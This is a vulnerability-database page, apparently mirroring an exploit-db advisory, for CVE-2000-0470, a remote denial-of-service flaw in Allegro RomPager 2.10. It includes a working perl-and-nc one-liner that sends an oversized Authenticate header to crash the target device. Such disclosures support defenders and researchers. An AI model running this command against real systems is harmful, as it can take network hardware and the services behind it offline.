Lucene search
+L

Allegro RomPager 2.10 - URL Request Denial of Service

🗓️ 01 Jun 2000 00:00:00Reported by netsecType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Allegro RomPager 2.10 has a remote denial of service vulnerability that can crash devices.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Allegro Software RomPager 2.10 Malformed Authentication Request DoS
27 Jul 200500:00
nessus
cve
CVE-2000-0470
13 Oct 200004:00
cve
cvelist
CVE-2000-0470
13 Oct 200004:00
cvelist
euvd
EUVD-2000-0469
7 Oct 202500:30
euvd
exploitpack
Allegro RomPager 2.10 - URL Request Denial of Service
1 Jun 200000:00
exploitpack
nvd
CVE-2000-0470
1 Jun 200004:00
nvd
openvas
Allegro Software RomPager 2.10 DoS Vulnerability
26 Mar 200600:00
openvas
openvas
Allegro Software RomPager 2.10 Denial of Service
26 Mar 200600:00
openvas
seebug
Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability
1 Jul 201400:00
seebug
Allegro's RomPager is reported prone to a remote denial of service vulnerability.

If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser. 

CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304

The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works

the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80

$ ping $ip_address # doesn't work 

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jun 2000 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 27.5
EPSS0.0712
33